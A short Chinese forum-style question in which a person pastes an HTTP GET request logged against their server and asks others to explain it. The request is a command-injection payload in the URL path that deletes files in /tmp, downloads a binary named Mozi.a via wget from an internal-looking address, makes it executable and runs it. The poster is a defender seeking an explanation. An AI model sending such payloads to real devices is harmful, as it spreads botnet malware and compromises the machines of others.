攻击的payload信息如下:
GET /shell?cd /tmp;rm -rf ;wget http://192.168.1.1:8088/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws HTTP/1.1
User-Agent: Hello, world
Host: xxx.xxx.xxx.xxx
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,/*;q=0.8
Connection: keep-alive
单单就这一个攻击请求。
就这一条get请求,应该拿不到我的shell吧,也要配合别的脚本才对吧。还有就这条下载语句也算我的网络内有192.168.1.1,但是没有它要下载的mozi.a呀,有没有哪位帮忙解释下这个攻击?